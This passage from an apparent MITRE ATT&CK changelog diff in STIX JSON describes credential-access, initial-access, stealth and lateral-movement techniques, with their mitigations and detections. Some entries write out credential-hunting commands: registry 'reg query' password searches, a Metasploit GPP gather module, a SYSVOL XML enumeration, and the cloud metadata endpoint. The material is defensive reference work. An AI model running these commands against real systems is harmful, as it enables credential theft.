+                    "description": "Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.\n\nOrganizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for access to internal network systems may be compromised and used.(Citation: CISA IT Service Providers)\n\nIn Office 365 environments, organizations may grant Microsoft partners or resellers delegated administrator permissions. By compromising a partner or reseller account, an adversary may be able to leverage existing delegated administrator relationships or send new delegated administrator offers to clients in order to gain administrative control over the victim tenant.(Citation: Office 365 Delegated Administration)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "initial-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1199",
+                            "external_id": "T1199"
+                        },
+                        {
+                            "source_name": "CISA IT Service Providers",
+                            "description": "CISA. (n.d.). APTs Targeting IT Service Provider Customers. Retrieved November 16, 2020.",
+                            "url": "https://us-cert.cisa.gov/APTs-Targeting-IT-Service-Provider-Customers"
+                        },
+                        {
+                            "source_name": "Office 365 Delegated Administration",
+                            "description": "Microsoft. (n.d.). Partners: Offer delegated administration. Retrieved May 27, 2022.",
+                            "url": "https://support.microsoft.com/en-us/topic/partners-offer-delegated-administration-26530dc0-ebba-415b-86b1-b55bc06b073e?ui=en-us&rs=en-us&ad=us"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Praetorian",
+                        "ExtraHop",
+                        "Jannie Li, Microsoft Threat Intelligence\u202fCenter\u202f(MSTIC)"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "IaaS",
+                        "Identity Provider",
+                        "Linux",
+                        "macOS",
+                        "Office Suite",
+                        "SaaS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.4",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.706000+00:00\", \"old_value\": \"2025-11-12 15:42:52.705000+00:00\"}}}",
+                    "previous_version": "2.4",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1030: Network Segmentation",
+                            "M1032: Multi-factor Authentication"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0488: Detect abuse of Trusted Relationships (third-party and delegated admin access)"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--19bf235b-8620-4997-b5b4-94e0659ed7c3",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-11 18:47:46.619000+00:00",
+                    "modified": "2026-05-12 15:12:00.622000+00:00",
+                    "name": "Cloud Instance Metadata API",
+                    "description": "Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.\n\nMost cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.(Citation: AWS Instance Metadata API) A cloud metadata API has been used in at least one high profile compromise.(Citation: Krebs Capital One August 2019)\n\nIf adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, adversaries may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows them to gain access to the sensitive information via a request to the Instance Metadata API.(Citation: RedLock Instance Metadata API 2018)\n\nThe de facto standard across cloud service providers is to host the Instance Metadata API at <code>http[:]//169.254.169.254</code>.\n",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "credential-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1552/005",
+                            "external_id": "T1552.005"
+                        },
+                        {
+                            "source_name": "AWS Instance Metadata API",
+                            "description": "AWS. (n.d.). Instance Metadata and User Data. Retrieved July 18, 2019.",
+                            "url": "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html"
+                        },
+                        {
+                            "source_name": "RedLock Instance Metadata API 2018",
+                            "description": "Higashi, Michael. (2018, May 15). Instance Metadata API: A Modern Day Trojan Horse. Retrieved July 16, 2019.",
+                            "url": "https://redlock.io/blog/instance-metadata-api-a-modern-day-trojan-horse"
+                        },
+                        {
+                            "source_name": "Krebs Capital One August 2019",
+                            "description": "Krebs, B.. (2019, August 19). What We Can Learn from the Capital One Hack. Retrieved March 25, 2020.",
+                            "url": "https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Praetorian"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "IaaS"
+                    ],
+                    "x_mitre_version": "1.4",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.622000+00:00\", \"old_value\": \"2025-10-24 17:48:27.965000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.4",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1035: Limit Access to Resource Over Network",
+                            "M1037: Filter Network Traffic",
+                            "M1042: Disable or Remove Feature or Program"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0001: Detect Access to Cloud Instance Metadata API (IaaS)"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--837f9164-50af-4ac0-8219-379d8a74cefc",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-04 12:52:13.006000+00:00",
+                    "modified": "2026-05-12 15:12:00.672000+00:00",
+                    "name": "Credentials In Files",
+                    "description": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\n\nIt is possible to extract passwords from backups or saved virtual machines through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003).(Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller.(Citation: SRD GPP)\n\nIn cloud and/or containerized environments, authenticated user and service account credentials are often stored in local configuration and credential files.(Citation: Unit 42 Hildegard Malware) They may also be found as parameters to deployment commands in container logs.(Citation: Unit 42 Unsecured Docker Daemons) In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files.(Citation: Specter Ops - Cloud Credential Storage)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "credential-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1552/001",
+                            "external_id": "T1552.001"
+                        },
+                        {
+                            "source_name": "CG 2014",
+                            "description": "CG. (2014, May 20). Mimikatz Against Virtual Machine Memory Part 1. Retrieved November 12, 2014.",
+                            "url": "http://carnal0wnage.attackresearch.com/2014/05/mimikatz-against-virtual-machine-memory.html"
+                        },
+                        {
+                            "source_name": "Unit 42 Hildegard Malware",
+                            "description": "Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021.",
+                            "url": "https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/"
+                        },
+                        {
+                            "source_name": "Unit 42 Unsecured Docker Daemons",
+                            "description": "Chen, J.. (2020, January 29). Attacker's Tactics and Techniques in Unsecured Docker Daemons Revealed. Retrieved March 31, 2021.",
+                            "url": "https://unit42.paloaltonetworks.com/attackers-tactics-and-techniques-in-unsecured-docker-daemons-revealed/"
+                        },
+                        {
+                            "source_name": "Specter Ops - Cloud Credential Storage",
+                            "description": "Maddalena, C.. (2018, September 12). Head in the Clouds. Retrieved October 4, 2019.",
+                            "url": "https://posts.specterops.io/head-in-the-clouds-bd038bb69e48"
+                        },
+                        {
+                            "source_name": "SRD GPP",
+                            "description": "Security Research and Defense. (2014, May 13). MS14-025: An Update for Group Policy Preferences. Retrieved January 28, 2015.",
+                            "url": "http://blogs.technet.com/b/srd/archive/2014/05/13/ms14-025-an-update-for-group-policy-preferences.aspx"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Rory McCune, Aqua Security",
+                        "Jay Chen, Palo Alto Networks",
+                        "Yossi Weizman, Azure Defender Research Team",
+                        "Vishwas Manral, McAfee",
+                        "Microsoft Threat Intelligence Center (MSTIC)"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Containers",
+                        "IaaS",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.3",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.672000+00:00\", \"old_value\": \"2025-10-24 17:49:03+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.3",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1017: User Training",
+                            "M1022: Restrict File and Directory Permissions",
+                            "M1027: Password Policies",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0307: Detect Access to Unsecured Credential Files Across Platforms"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--341e222a-a6e3-4f6f-b69c-831d792b1580",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-04 12:58:40.678000+00:00",
+                    "modified": "2026-05-12 15:12:00.624000+00:00",
+                    "name": "Credentials in Registry",
+                    "description": "Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.\n\nExample commands to find Registry keys related to password information: (Citation: Pentestlab Stored Credentials)\n\n* Local Machine Hive: <code>reg query HKLM /f password /t REG_SZ /s</code>\n* Current User Hive: <code>reg query HKCU /f password /t REG_SZ /s</code>",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "credential-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1552/002",
+                            "external_id": "T1552.002"
+                        },
+                        {
+                            "source_name": "Pentestlab Stored Credentials",
+                            "description": "netbiosX. (2017, April 19). Stored Credentials. Retrieved April 6, 2018.",
+                            "url": "https://pentestlab.blog/2017/04/19/stored-credentials/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Sudhanshu Chauhan, @Sudhanshu_C"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.624000+00:00\", \"old_value\": \"2025-10-24 17:48:37.378000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1026: Privileged Account Management",
+                            "M1027: Password Policies",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0250: Detect Credential Discovery via Windows Registry Enumeration"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-11 18:43:06.253000+00:00",
+                    "modified": "2026-05-12 15:12:00.705000+00:00",
+                    "name": "Group Policy Preferences",
+                    "description": "Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)\n\nThese group policies are stored in SYSVOL on a domain controller. This means that any domain user can view the SYSVOL share and decrypt the password (using the AES key that has been made public).(Citation: Microsoft GPP Key)\n\nThe following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:\n\n* Metasploit\u2019s post exploitation module: <code>post/windows/gather/credentials/gpp</code>\n* Get-GPPPassword(Citation: Obscuresecurity Get-GPPPassword)\n* gpprefdecrypt.py\n\nOn the SYSVOL share, adversaries may use the following command to enumerate potential GPP XML files: <code>dir /s * .xml</code>\n",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "credential-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1552/006",
+                            "external_id": "T1552.006"
+                        },
+                        {
+                            "source_name": "Obscuresecurity Get-GPPPassword",
+                            "description": "Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell. Retrieved April 11, 2018.",
+                            "url": "https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html"
+                        },
+                        {
+                            "source_name": "Microsoft GPP 2016",
+                            "description": "Microsoft. (2016, August 31). Group Policy Preferences. Retrieved March 9, 2020.",
+                            "url": "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)"
+                        },
+                        {
+                            "source_name": "Microsoft GPP Key",
+                            "description": "Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April 11, 2018.",
+                            "url": "https://msdn.microsoft.com/library/cc422924.aspx"
+                        },
+                        {
+                            "source_name": "ADSecurity Finding Passwords in SYSVOL",
+                            "description": "Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL & Exploiting Group Policy Preferences. Retrieved February 17, 2020.",
+                            "url": "https://adsecurity.org/?p=2288"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.705000+00:00\", \"old_value\": \"2025-10-24 17:49:05.282000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1015: Active Directory Configuration",
+                            "M1047: Audit",
+                            "M1051: Update Software"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0381: Detect Access and Decryption of Group Policy Preference (GPP) Credentials in SYSVOL"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--60b508a1-6a5e-46b1-821a-9f7b78752abf",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-04 13:06:49.258000+00:00",
+                    "modified": "2026-05-12 15:12:00.635000+00:00",
+                    "name": "Private Keys",
+                    "description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.(Citation: Wikipedia Public Key Crypto) Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. \n\nAdversaries may also look in common key directories, such as <code>~/.ssh</code> for SSH keys on * nix-based systems or <code>C:&#92;Users&#92;(username)&#92;.ssh&#92;</code> on Windows. Adversary tools may also search compromised systems for file extensions relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation: Palo Alto Prince of Persia)\n\nWhen a device is registered to Entra ID, a device key and a transport key are generated and used to verify the device\u2019s identity.(Citation: Microsoft Primary Refresh Token) An adversary with access to the device may be able to export the keys in order to impersonate the device.(Citation: AADInternals Azure AD Device Identities)\n\nOn network devices, private keys may be exported via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `crypto pki export`.(Citation: cisco_deploy_rsa_keys) \n\nSome private keys require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line. These private keys can be used to authenticate to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "credential-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1552/004",
+                            "external_id": "T1552.004"
+                        },
+                        {
+                            "source_name": "Palo Alto Prince of Persia",
+                            "description": "Bar, T., Conant, S., Efraim, L. (2016, June 28). Prince of Persia \u2013 Game Over. Retrieved July 5, 2017.",
+                            "url": "https://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/"
+                        },
+                        {
+                            "source_name": "cisco_deploy_rsa_keys",
+                            "description": "Cisco. (2023, February 17). Chapter: Deploying RSA Keys Within a PKI . Retrieved March 27, 2023.",
+                            "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/sec_conn_pki/configuration/xe-17/sec-pki-xe-17-book/sec-deploy-rsa-pki.html#GUID-1CB802D8-9DE3-447F-BECE-CF22F5E11436"
+                        },
+                        {
+                            "source_name": "AADInternals Azure AD Device Identities",
+                            "description": "Dr. Nestori Syynimaa. (2022, February 15). Stealing and faking Azure AD device identities. Retrieved February 21, 2023.",
+                            "url": "https://aadinternals.com/post/deviceidentity/"
+                        },
+                        {
+                            "source_name": "Kaspersky Careto",
+                            "description": "Kaspersky Labs. (2014, February 11). Unveiling \u201cCareto\u201d - The Masked APT. Retrieved July 5, 2017.",
+                            "url": "https://web.archive.org/web/20141031134104/http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf"
+                        },
+                        {
+                            "source_name": "Microsoft Primary Refresh Token",
+                            "description": "Microsoft. (2022, September 9). What is a Primary Refresh Token?. Retrieved February 21, 2023.",
+                            "url": "https://learn.microsoft.com/en-us/azure/active-directory/devices/concept-primary-refresh-token"
+                        },
+                        {
+                            "source_name": "Wikipedia Public Key Crypto",
+                            "description": "Wikipedia. (2017, June 29). Public-key cryptography. Retrieved July 5, 2017.",
+                            "url": "https://en.wikipedia.org/wiki/Public-key_cryptography"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Itzik Kotler, SafeBreach",
+                        "Austin Clark, @c2defense"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.3",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.635000+00:00\", \"old_value\": \"2025-10-24 17:48:50.819000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.3",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1022: Restrict File and Directory Permissions",
+                            "M1027: Password Policies",
+                            "M1041: Encrypt Sensitive Information",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0549: Detect Suspicious Access to Private Key Files and Export Attempts Across Platforms"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--59bd0dec-f8b2-4b9a-9141-37a1e6899761",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-09-04 14:35:04.617000+00:00",
+                    "modified": "2026-05-12 15:12:00.635000+00:00",
+                    "name": "Unused/Unsupported Cloud Regions",
+                    "description": "Adversaries may create cloud instances in unused geographic service regions in order to evade detection. Access is usually obtained through compromising accounts used to manage cloud infrastructure.\n\nCloud service providers often provide infrastructure throughout the world in order to improve performance, provide redundancy, and allow customers to meet compliance requirements. Oftentimes, a customer will only use a subset of the available regions and may not actively monitor other regions. If an adversary creates resources in an unused region, they may be able to operate undetected.\n\nA variation on this behavior takes advantage of differences in functionality across cloud regions. An adversary could utilize regions which do not support advanced detection services in order to avoid detection of their activity.\n\nAn example of adversary use of unused AWS regions is to mine cryptocurrency through [Resource Hijacking](https://attack.mitre.org/techniques/T1496), which can cost organizations substantial amounts of money over time depending on the processing power used.(Citation: CloudSploit - Unused AWS Regions)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1535",
+                            "external_id": "T1535"
+                        },
+                        {
+                            "source_name": "CloudSploit - Unused AWS Regions",
+                            "description": "CloudSploit. (2019, June 8). The Danger of Unused AWS Regions. Retrieved October 8, 2019.",
+                            "url": "https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Netskope"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "IaaS"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.635000+00:00\", \"old_value\": \"2026-04-15 22:48:40.705000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1054: Software Configuration"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0247: Detection of Adversary Use of Unused or Unsupported Cloud Regions (IaaS)"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--51a14c76-dd3b-440b-9c20-2bf91d25a814",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-01-30 16:18:36.873000+00:00",
+                    "modified": "2026-05-12 15:12:00.633000+00:00",
+                    "name": "Use Alternate Authentication Material",
+                    "description": "Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls. \n\nAuthentication processes generally require a valid identity (e.g., username) along with one or more authentication factors (e.g., password, pin, physical smart card, token generator, etc.). Alternate authentication material is legitimately generated by systems after a user or application successfully authenticates by providing a valid identity and the required authentication factor(s). Alternate authentication material may also be generated during the identity creation process.(Citation: NIST Authentication)(Citation: NIST MFA)\n\nCaching alternate authentication material allows the system to verify an identity has successfully authenticated without asking the user to reenter authentication factor(s). Because the alternate authentication must be maintained by the system\u2014either in memory or on disk\u2014it may be at risk of being stolen through [Credential Access](https://attack.mitre.org/tactics/TA0006) techniques. By stealing alternate authentication material, adversaries are able to bypass system access controls and authenticate to systems without knowing the plaintext password or any additional authentication factors.\n",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "lateral-movement"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1550",
+                            "external_id": "T1550"
+                        },
+                        {
+                            "source_name": "NIST Authentication",
+                            "description": "NIST. (n.d.). Authentication. Retrieved January 30, 2020.",
+                            "url": "https://csrc.nist.gov/glossary/term/authentication"
+                        },
+                        {
+                            "source_name": "NIST MFA",
+                            "description": "NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September 25, 2024.",
+                            "url": "https://csrc.nist.gov/glossary/term/multi_factor_authentication"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Blake Strom, Microsoft Threat Intelligence",
+                        "Pawel Partyka, Microsoft Threat Intelligence"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Containers",
+                        "IaaS",
+                        "Identity Provider",
+                        "Linux",
+                        "Office Suite",
+                        "SaaS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.633000+00:00\", \"old_value\": \"2026-04-15 22:48:07.391000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1013: Application Developer Guidance",
+                            "M1015: Active Directory Configuration",
+                            "M1018: User Account Management",
+                            "M1026: Privileged Account Management",
